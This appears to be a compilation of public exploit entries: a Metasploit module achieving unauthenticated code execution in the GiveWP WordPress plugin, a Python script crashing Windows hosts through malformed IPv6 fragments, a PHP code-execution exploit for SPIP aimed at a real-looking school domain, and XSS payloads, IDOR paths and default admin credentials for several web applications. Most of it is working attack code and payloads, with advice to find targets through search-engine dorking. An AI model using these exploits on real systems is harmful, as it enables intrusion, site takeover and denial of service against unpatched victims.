<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::Remote::HTTP::Wordpress<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'GiveWP Unauthenticated Donation Process Exploit',<br /> 'Description' => %q{<br /> The GiveWP Donation Plugin and Fundraising Platform plugin for WordPress in all versions up to and including 3.14.1 is vulnerable to a PHP Object Injection (POI) attack granting an unauthenticated arbitrary code execution.<br /> },<br /><br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'Villu Orav', # Initial Discovery<br /> 'EQSTSeminar', # Proof of Concept<br /> 'Julien Ahrens', # Vulnerability Analysis<br /> 'Valentin Lobstein' # Metasploit Module<br /> ],<br /> 'References' => [<br /> ['CVE', '2024-5932'],<br /> ['URL', 'https://github.com/EQSTSeminar/CVE-2024-5932'],<br /> ['URL', 'https://www.rcesecurity.com/2024/08/wordpress-givewp-pop-to-rce-cve-2024-5932'],<br /> ['URL', 'https://www.wordfence.com/blog/2024/08/4998-bounty-awarded-and-100000-wordpress-sites-protected-against-unauthenticated-remote-code-execution-vulnerability-patched-in-givewp-wordpress-plugin']<br /> ],<br /> 'DisclosureDate' => '2024-08-25',<br /> 'Platform' => %w[unix linux win],<br /> 'Arch' => [ARCH_CMD],<br /> 'Privileged' => false,<br /> 'Targets' => [<br /> [<br /> 'Unix/Linux Command Shell',<br /> {<br /> 'Platform' => %w[unix linux],<br /> 'Arch' => ARCH_CMD<br /> # tested with cmd/linux/http/x64/meterpreter/reverse_tcp<br /> }<br /> ],<br /> [<br /> 'Windows Command Shell',<br /> {<br /> 'Platform' => 'win',<br /> 'Arch' => ARCH_CMD<br /> # tested with cmd/windows/http/x64/meterpreter/reverse_tcp<br /> }<br /> ]<br /> ],<br /> 'DefaultTarget' => 0,<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]<br /> }<br /> )<br /> )<br /> end<br /><br /> def check<br /> return CheckCode::Unknown unless wordpress_and_online?<br /><br /> print_status("WordPress Version: #{wordpress_version}") if wordpress_version<br /> check_code = check_plugin_version_from_readme('give', '3.14.2')<br /> return CheckCode::Safe unless check_code.code == 'appears'<br /><br /> print_good("Detected GiveWP Plugin version: #{check_code.details[:version]}")<br /> CheckCode::Appears<br /> end<br /><br /> def exploit<br /> forms = fetch_form_list<br /> fail_with(Failure::UnexpectedReply, 'No forms found.') if forms.empty?<br /><br /> selected_form = forms.sample<br /> valid_form = retrieve_and_analyze_form(selected_form['id'])<br /><br /> return print_error('Failed to retrieve a valid form for exploitation.') unless valid_form<br /><br /> print_status("Using Form ID: #{valid_form['give_form_id']} for exploitation.")<br /> send_exploit_request(<br /> valid_form['give_form_id'],<br /> valid_form['give_form_hash'],<br /> valid_form['give_price_id'],<br /> valid_form['give_amount']<br /> )<br /> end<br /><br /> def fetch_form_list<br /> res = send_request_cgi(<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php'),<br /> 'data' => 'action=give_form_search'<br /> )<br /><br /> return print_error('Failed to retrieve form list.') unless res&.code == 200<br /><br /> forms = JSON.parse(res.body)<br /> form_ids = forms.map { |form| form['id'] }.sort<br /><br /> print_good("Successfully retrieved form list. Available Form IDs: #{form_ids.join(', ')}")<br /> forms<br /> end<br /><br /> def retrieve_and_analyze_form(form_id)<br /> form_res = send_request_cgi(<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php'),<br /> 'vars_post' => { 'action' => 'give_donation_form_nonce', 'give_form_id' => form_id }<br /> )<br /><br /> return unless form_res&.code == 200<br /><br /> form_data = JSON.parse(form_res.body)<br /> give_form_id = form_id<br /> give_form_hash = form_data['data']<br /> give_price_id = '0'<br /> give_amount = '$10.00'<br /> # Somehow, can't randomize give_price_id and give_amount otherwise the exploit won't work.<br /><br /> return unless give_form_hash<br /><br /> {<br /> 'give_form_id' => give_form_id,<br /> 'give_form_hash' => give_form_hash,<br /> 'give_price_id' => give_price_id,<br /> 'give_amount' => give_amount<br /> }<br /> end<br /><br /> def send_exploit_request(give_form_id, give_form_hash, give_price_id, give_amount)<br /> final_payload = format(<br /> 'O:19:"Stripe\\\\\\\\StripeObject":1:{s:10:"\\0*\\0_values";a:1:{s:3:"foo";' \<br /> 'O:62:"Give\\\\\\\\PaymentGateways\\\\\\\\DataTransferObjects\\\\\\\\GiveInsertPaymentData":1:{' \<br /> 's:8:"userInfo";a:1:{s:7:"address";O:4:"Give":1:{s:12:"\\0*\\0container";' \<br /> 'O:33:"Give\\\\\\\\Vendors\\\\\\\\Faker\\\\\\\\ValidGenerator":3:{s:12:"\\0*\\0validator";' \<br /> 's:10:"shell_exec";s:12:"\\0*\\0generator";' \<br /> 'O:34:"Give\\\\\\\\Onboarding\\\\\\\\SettingsRepository":1:{' \<br /> 's:11:"\\0*\\0settings";a:1:{s:8:"address1";s:%<length>d:"%<encoded>s";}}' \<br /> 's:13:"\\0*\\0maxRetries";i:10;}}}}}}',<br /> length: payload.encoded.length,<br /> encoded: payload.encoded<br /> )<br /><br /> data = {<br /> 'give-form-id' => give_form_id,<br /> 'give-form-hash' => give_form_hash,<br /> 'give-price-id' => give_price_id,<br /> 'give-amount' => give_amount,<br /> 'give_first' => Faker::Name.first_name,<br /> 'give_last' => Faker::Name.last_name,<br /> 'give_email' => Faker::Internet.email,<br /> 'give_title' => final_payload,<br /> 'give-gateway' => 'offline',<br /> 'action' => 'give_process_donation'<br /> }<br /><br /> send_request_cgi({<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php'),<br /> 'data' => URI.encode_www_form(data)<br /> }, 0)<br /> end<br />end<br /></code></pre>
<pre><code>[CVE-ID]:CVE-2024-44778<br />------------------------------------------<br />[Suggested description]:A reflected cross-site scripting (XSS) vulnerability in the parent parameter in the index page of vTiger CRM 7.4.0 allows attackers to execute arbitrary code in the context of a user's browser via injecting a crafted payload.<br />------------------------------------------<br />[Additional Information]<br />PoC:<br />https://demo7.vtexperts.com/vtigercrm7demo/index.php?module=Invoice&view=List&app=INVENTORY&parent=%22-alert()-%22<br />------------------------------------------<br />[Vulnerability Type]:Cross Site Scripting (XSS)<br />------------------------------------------<br />[Vendor of Product]:vTiger<br />------------------------------------------<br />[Affected Product Code Base]:vTiger CRM - 7.4.0.<br />------------------------------------------<br />[Affected Component]:The parent parameter of vTiger CRM 7.4.0 Index page<br />------------------------------------------<br />[Attack Type]:Remote<br />------------------------------------------<br />[CVE Impact Other]:Run Arbitrary Javascript code<br />------------------------------------------<br />[Attack Vectors]:Crafted URL<br />------------------------------------------<br />[Has vendor confirmed or acknowledged the vulnerability?]:true<br />------------------------------------------<br />[Discoverer]:Marco Nappi<br />------------------------------------------<br />[Reference]<br />http://vtiger.com<br />https://demo7.vtexperts.com/vtigercrm7demo/index.php?module=Invoice&view=List&app=INVENTORY&parent=%22-alert()-%22<br /><br /><br /><br /><br />[CVE-ID]:CVE-2024-44779<br />------------------------------------------<br />[Suggested description]<br />A reflected cross-site scripting (XSS) vulnerability in the viewname parameter in the index page of vTiger CRM 7.4.0 allows attackers to execute arbitrary code in the context of a user's browser via injecting a crafted payload.<br />------------------------------------------<br />[Additional Information]:<br />PoC:<br />https://demo7.vtexperts.com/vtigercrm7demo/index.php?module=Accounts&view=List&viewname=95ddd'+onpointerdown=alert()+alt=<br />------------------------------------------<br />[Vulnerability Type]<br />Cross Site Scripting (XSS)<br />------------------------------------------<br />[Vendor of Product]:vTiger<br />------------------------------------------<br />[Affected Product Code Base]:vTiger CRM - 7.4.0.<br />------------------------------------------<br />[Affected Component]:The "viewname" parameter of vTiger CRM 7.4.0 Index page .<br />------------------------------------------<br />[Attack Type]:Remote<br />------------------------------------------<br />[CVE Impact Other]:<br />Run Arbitrary JS code<br />------------------------------------------<br />[Attack Vectors]<br />Crafted URL<br />------------------------------------------<br />[Has vendor confirmed or acknowledged the vulnerability?]:true<br />------------------------------------------<br />[Discoverer]:Marco Nappi<br />------------------------------------------<br />[Reference]<br />http://vtiger.com<br />https://demo7.vtexperts.com/vtigercrm7demo/index.php?module=Accounts&view=List&viewname=95ddd<br /><br /><br /><br />[CVE-ID]:CVE-2024-44777<br />------------------------------------------<br />[Suggested description]<br />A reflected cross-site scripting (XSS) vulnerability in the tag parameter in the index page of vTiger CRM 7.4.0 allows attackers to execute arbitrary code in the context of a user's browser via injecting a crafted payload.<br />------------------------------------------<br />[Additional Information]<br />PoC:<br />https://demo7.vtexperts.com/vtigercrm7demo/index.php?module=Invoice&view=List&app=INVENTORY&tag=);alert();%22+alt=%22<br />------------------------------------------<br />[Vulnerability Type]:Cross Site Scripting (XSS)<br />------------------------------------------<br />[Vendor of Product]:vTiger<br />------------------------------------------<br />[Affected Product Code Base]:vTiger CRM - 7.4.0.<br />------------------------------------------<br />[Affected Component]<br />The "tag" parameter of vTiger CRM 7.4.0 Index page<br />------------------------------------------<br />[Attack Type]:Remote<br />------------------------------------------<br />[CVE Impact Other]<br />Run Arbitrary Javascript code<br />------------------------------------------<br />[Attack Vectors]:Crafted URL<br />------------------------------------------<br />[Has vendor confirmed or acknowledged the vulnerability?]:true<br />------------------------------------------<br />[Discoverer]:Marco Nappi<br />------------------------------------------<br />[Reference]<br />http://vtiger.com<br />https://demo7.vtexperts.com/vtigercrm7demo/index.php?module=Invoice&view=List&app=INVENTORY&tag=);alert();%22+alt=%22<br /></code></pre>
<pre><code>#!/usr/bin/env python3<br /># -*- coding: utf-8 -*-<br /><br /># Exploit Title: Windows IPv6 CVE-2024-38063 Checker and Denial-Of-Service<br /># Date: 2024-08-07<br /># Exploit Author: Photubias<br /># Vendor Homepage: https://microsoft.com<br /># Vendor Advisory: [1] https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38063<br /># Version: Windows 10, 11 <10.0.26100.1457 and Server 2016-2019-2022 <10.0.17763.6189<br /># Tested on: Windows 11 23H2 and Windows Server 2022<br /># CVE: CVE-2024-38063<br /><br />import os, subprocess, re, time, sys<br /><br />## Variables<br />sDstIP = 'fe80::78b7:6283:49ad:c565' ## Placeholder<br />if len(sys.argv) > 1: sDstIP = sys.argv[1] ## Please provide an argument<br />sDstMAC = '00:0C:29:55:E1:C8' ## Not required, will try to get the MAC via Neighbor Discovery<br />iBatches = 20<br />iCorruptions = 20 ## How many times do we want to corrupt the tcpip.sys memory per batch<br /><br />try:<br /> print('--- Loading Scapy, might take some time ...')<br /> from scapy.config import conf<br /> conf.ipv6_enabled = False<br /> import scapy.all as scapy<br /> scapy.conf.verb = 0<br />except:<br /> print('Error while loading scapy, please run "pip install scapy"')<br /> exit(1)<br /><br />import logging<br />logging.getLogger('scapy.runtime').setLevel(logging.ERROR)<br /><br />def selectInterface(): #adapter[] = npfdevice, ip, mac<br /> def getAllInterfaces(): <br /> lstInterfaces=[]<br /> if os.name == 'nt':<br /> proc = subprocess.Popen('getmac /NH /V /FO csv | FINDSTR /V /I disconnected', shell=True, stdout=subprocess.PIPE)<br /> for bInterface in proc.stdout.readlines():<br /> lstInt = bInterface.split(b',')<br /> sAdapter = lstInt[0].strip(b'"').decode()<br /> sDevicename = lstInt[1].strip(b'"').decode()<br /> sMAC = lstInt[2].strip(b'"').decode().lower().replace('-', ':')<br /> sWinguID = lstInt[3].strip().strip(b'"').decode()[-38:]<br /> proc = subprocess.Popen('netsh int ipv6 show addr "{}" | FINDSTR /I Address'.format(sAdapter), shell=True, stdout=subprocess.PIPE)<br /> try: sIP = re.findall(r'[\w:]+:+[\w:]+', proc.stdout.readlines()[0].strip().decode())[0]<br /> except: sIP = ''<br /> if len(sMAC) == 17: lstInterfaces.append([sAdapter, sIP, sMAC, sDevicename, sWinguID]) # When no or bad MAC address (e.g. PPP adapter), do not add<br /> else:<br /> proc = subprocess.Popen('for i in $(ip address | grep -v "lo" | grep "default" | cut -d":" -f2 | cut -d" " -f2);do echo $i $(ip address show dev $i | grep "inet6 " | cut -d" " -f6 | cut -d"/" -f1) $(ip address show dev $i | grep "ether" | cut -d" " -f6);done', shell=True, stdout=subprocess.PIPE)<br /> for bInterface in proc.stdout.readlines():<br /> lstInt = bInterface.strip().split(b' ')<br /> try: <br /> if len(lstInt[2]) == 17: lstInterfaces.append([lstInt[0].decode(), lstInt[1].decode(), lstInt[2].decode(), '', ''])<br /> except: pass<br /> return lstInterfaces<br /> <br /> lstInterfaces = getAllInterfaces()<br /> if len(lstInterfaces) > 1:<br /> i = 1<br /> for lstInt in lstInterfaces: #array of arrays: adapter, ip, mac, windows devicename, windows guID<br /> print('[{}] {} has {} ({})'.format(i, lstInt[2], lstInt[1], lstInt[0]))<br /> i += 1<br /> #sAnswer = input('[?] Please select the adapter [1]: ')<br /> sAnswer='3'<br /> else: sAnswer = None<br /> if not sAnswer or sAnswer == '' or not sAnswer.isdigit() or int(sAnswer) >= i: sAnswer = 1<br /> iAnswer = int(sAnswer) - 1<br /> sNPF = lstInterfaces[iAnswer][0]<br /> sIP = lstInterfaces[iAnswer][1]<br /> sMAC = lstInterfaces[iAnswer][2]<br /> if os.name == 'nt': sNPF = r'\Device\NPF_' + lstInterfaces[iAnswer][4]<br /> return (sNPF, sIP, sMAC, lstInterfaces[iAnswer][3])<br /><br />def get_packets(iID, sDstIPv6, sDstMac=None):<br /> iFragID = 0xbedead00 + iID<br /> oPacket1 = scapy.IPv6(fl=1, hlim=64+iID, dst=sDstIPv6) / scapy.IPv6ExtHdrDestOpt(options=[scapy.PadN(otype=0x81, optdata='bad')])<br /> oPacket2 = scapy.IPv6(fl=1, hlim=64+iID, dst=sDstIPv6) / scapy.IPv6ExtHdrFragment(id=iFragID, m = 1, offset = 0) / 'notalive'<br /> oPacket3 = scapy.IPv6(fl=1, hlim=64+iID, dst=sDstIPv6) / scapy.IPv6ExtHdrFragment(id=iFragID, m = 0, offset = 1)<br /> if sDstMac: ## Should always be this, it seems sending to 'ff:ff:ff:ff:ff:ff' does not work<br /> oPacket1 = scapy.Ether(dst=sDstMac) / oPacket1<br /> oPacket2 = scapy.Ether(dst=sDstMac) / oPacket2<br /> oPacket3 = scapy.Ether(dst=sDstMac) / oPacket3<br /> return [oPacket1, oPacket2, oPacket3]<br /><br />def doIPv6ND(sDstIP, sInt): ## Try to get a MAC address via IPv6 Neighbour Sollicitation<br /> sMACResp = None<br /> oNeighborSollicitation = scapy.IPv6(dst=sDstIP) / scapy.ICMPv6ND_NS(tgt=sDstIP) / scapy.ICMPv6NDOptSrcLLAddr(lladdr='ff:ff:ff:ff:ff:ff')<br /> oResponse = scapy.sr1(oNeighborSollicitation, timeout=5, iface=sInt)<br /> if oResponse and scapy.ICMPv6NDOptDstLLAddr in oResponse:<br /> sMACResp = oResponse[scapy.ICMPv6NDOptDstLLAddr].lladdr<br /> return sMACResp<br /><br />lstInt = selectInterface() ## NPF, IPv6, MAC, Name<br /><br />sMAC = doIPv6ND(sDstIP, lstInt[0])<br />if sMAC: <br /> print(f'[+] Target {sDstIP} is reachable, got MAC Address {sMAC}')<br /> sDstMAC = sMAC<br />elif sDstMAC != '':<br /> print('[-] Target not responding to Neighbor Sollicitation Packets, using the provided MAC {}'.format(sDstMAC))<br />else: <br /> print('[-] Without a MAC address, this exploit will probably not work')<br /><br />lstPacketsToSend = []<br />for i in range(iBatches):<br /> for j in range(iCorruptions):<br /> lstPacketsToSend += get_packets(j, sDstIP, sDstMAC) + get_packets(j, sDstIP, sDstMAC)<br /><br />## 'send' is Layer3 (let scapy figure out the MAC address), 'sendp' is L2 (MAC address is filled in, much better)<br />print('[i] Verifying vulnerability against IPv6 address {}'.format(sDstIP))<br />## Verification first: "ICMPv6ParamProblem"<br />lstResp = scapy.srp1(lstPacketsToSend[0], iface=lstInt[0], timeout=5)<br />if lstResp and scapy.IPv6 in lstResp[0] and scapy.ICMPv6ParamProblem in lstResp[0]: <br /> print('[+] Yes, {} is vulnerable and exploitable for CVE-2024-38063'.format(sDstIP))<br />else: <br /> input('[-] Not vulnerable or firewall is enabled. Please verify and rerun or press enter to continue')<br />print('[i] Waiting 10 seconds to let the target cool down (more is better)')<br />time.sleep(10)<br />input('[?] OK, continue to execute the Denial Of Service (BSOD)? Press Ctrl+C to cancel now')<br />########## Exploit<br />print('[+] Sending {} packets now via interface {} {}'.format(len(lstPacketsToSend), lstInt[0], lstInt[3]))<br />scapy.conf.verb = 1<br />scapy.sendp(lstPacketsToSend, iface=lstInt[0])<br />print('[+] All packets are sent, now it takes *exactly* 60 seconds for the target to crash')<br /> <br /><br /></code></pre>
<pre><code># Exploit Title: Stored XSS in Gitea<br /># Date: 27/08/2024<br /># Exploit Authors: Catalin Iovita & Alexandru Postolache<br /># Vendor Homepage: (https://github.com/go-gitea/gitea)<br /># Version: 1.22.0<br /># Tested on: Linux 5.15.0-107, Go 1.23.0<br /># CVE: CVE-2024-6886<br /><br />## Vulnerability Description<br />Gitea 1.22.0 is vulnerable to a Stored Cross-Site Scripting (XSS) vulnerability. This vulnerability allows an attacker to inject malicious scripts that get stored on the server and executed in the context of another user's session.<br /><br />## Steps to Reproduce<br />1. Log in to the application.<br />2. Create a new repository or modify an existing repository by clicking the Settings button from the `$username/$repo_name/settings` endpoint.<br />3. In the Description field, input the following payload:<br /><br /> <a href=javascript:alert()>XSS test</a><br /><br />4. Save the changes.<br />5. Upon clicking the repository description, the payload was successfully injected in the Description field. By clicking on the message, an alert box will appear, indicating the execution of the injected script.<br /> <br /><br /></code></pre>
<pre><code># Exploit Title: Stored XSS in NoteMark<br /># Date: 07/29/2024<br /># Exploit Author: Alessio Romano (sfoffo)<br /># Vendor Homepage: https://notemark.docs.enchantedcode.co.uk/<br /># Version: 0.13.0 and below<br /># Tested on: Linux<br /># References:<br />https://notes.sfoffo.com/contributions/2024-contributions/cve-2024-41819,<br />https://github.com/enchant97/note-mark/commit/a0997facb82f85bfb8c0d497606d89e7d150e182,<br />https://github.com/enchant97/note-mark/security/advisories/GHSA-rm48-9mqf-8jc3<br /># CVE: CVE-2024-41819<br /><br />## Steps to Reproduce<br />1. Log in to the application.<br />2. Create a new note or enter a previously created note.<br />3. Access the note editor functionality from the selected note by clicking<br />on the "Editor" tab.<br />4. Input the following payload:<br />[xss-link](javascript:alert(1))<br />5. Save the changes.<br />6. Click on the "Rendered" tab to view the rendered markdown version of the<br />note. Click on the previously created link to pop the injected alert.<br /><br />## HTTP Request PoC<br /><br />PUT /api/notes/<note-uuid>/content HTTP/1.1<br />Host: localhost:8000<br />Accept: */*<br />Content-Type: text/plain;charset=UTF-8<br />Content-Length: 34<br />Sec-Fetch-Site: same-origin<br />Authorization: Bearer <TOKEN><br /><br /><br />[xss-link](javascript:alert(1))<br /><br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Online Graduate Tracer System V 1.0.0 IDOR Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/tracking.zip |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Insecure Direct Object Reference : leads to the creation of a new admin.<br /><br />[+] use payload : /admin/user_ad.php or /admin/homead.php<br /><br />[+] http://127.0.0.1/tracking/admin/user_ad.php<br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : SPIP 4.2.5 PHP Code execution Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits) |<br />| # Vendor : https://www.spip.net/ |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Line 49 : Set your target.<br /><br />[+] Save Payload as poc.php and run from cmd = C:\www\test>php poc.php<br /><br />[+] Payload :<br /><br /><?php<br /><br />class IndoushkaExploit {<br /> private $targetUrl;<br /> private $payload;<br /><br /> public function __construct($targetUrl, $payload) {<br /> $this->targetUrl = rtrim($targetUrl, '/') . '/spip.php';<br /> $this->payload = $this->generatePayload($payload);<br /> }<br /><br /> private function generatePayload($payload) {<br /> // توليد الحمولة مع تضمين الأمر المراد تنفيذه<br /> return "[<img" . rand(10000000, 99999999) . ">->URL`<?php {$payload} ?>`]";<br /> }<br /><br /> public function exploit() {<br /> // إعداد بيانات POST التي سيتم إرسالها إلى الهدف<br /> $data = http_build_query(['action' => 'porte_plume_previsu', 'data' => $this->payload]);<br /><br /> // تهيئة طلب HTTP باستخدام دالة cURL<br /> $ch = curl_init($this->targetUrl);<br /> curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);<br /> curl_setopt($ch, CURLOPT_POST, true);<br /> curl_setopt($ch, CURLOPT_POSTFIELDS, $data);<br /><br /> // إضافة رؤوس مخصصة لتجاوز المنع<br /> curl_setopt($ch, CURLOPT_HTTPHEADER, [<br /> 'Content-Type: application/x-www-form-urlencoded',<br /> 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3'<br /> ]);<br /><br /> // تنفيذ الطلب<br /> $response = curl_exec($ch);<br /><br /> // تحقق من وجود أخطاء في cURL<br /> if (curl_errno($ch)) {<br /> echo "cURL Error: " . curl_error($ch) . "\n";<br /> } else {<br /> echo "Exploit Sent! Response:\n";<br /> echo $response;<br /> }<br /><br /> curl_close($ch);<br /> }<br />}<br /><br />// مثال على الاستخدام<br />$targetUrl = 'https://eps.enseigne.ac-lyon.fr/spip/'; // استبدل هذا بالعنوان الحقيقي<br />$payload = 'system("pwd");'; // أوامر PHP التي تريد تنفيذها<br /><br />$exploit = new IndoushkaExploit($targetUrl, $payload);<br />$exploit->exploit();<br /><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Online Bus Ticketing v1.0 IDOR Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://download-media.code-projects.org/2020/04/Bus_Booking_IN_PHP_CSS_JavaScript_AND_MYSQL__FREE_DOWNLOAD.zip |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Insecure Direct Object Reference : Allows you as a visitor to access the control panel full permissions.<br /><br />[+] use payload :/Administrator/add_admin.php<br /><br />[+] http://127.0.0.1/BusBooking-master/Administrator/add_admin.php<br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Online Appointment System v1.0 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : https://www.sourcecodester.com/php/14502/online-appointment-system-php-full-source-code-2020.html |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Insecure Settings : appears to leave a default administrative account in place post installation.<br /><br />[+] use payload : user = admin & pass = admin123<br /><br />[+] https://www/127.0.0.1/yorubanwitness000webhostappcom/admin/<br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Multi-Vendor Online Groceries Management System v1.0 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : https://www.sourcecodester.com/php/15166/multi-vendor-online-groceries-management-system-phpoop-free-source-code.html |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Insecure Settings : appears to leave a default administrative account in place post installation.<br /><br />[+] use payload : user = admin & pass = admin123<br /><br />[+] https://www/127.0.0.1/yorubanwitness000webhostappcom/admin/<br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>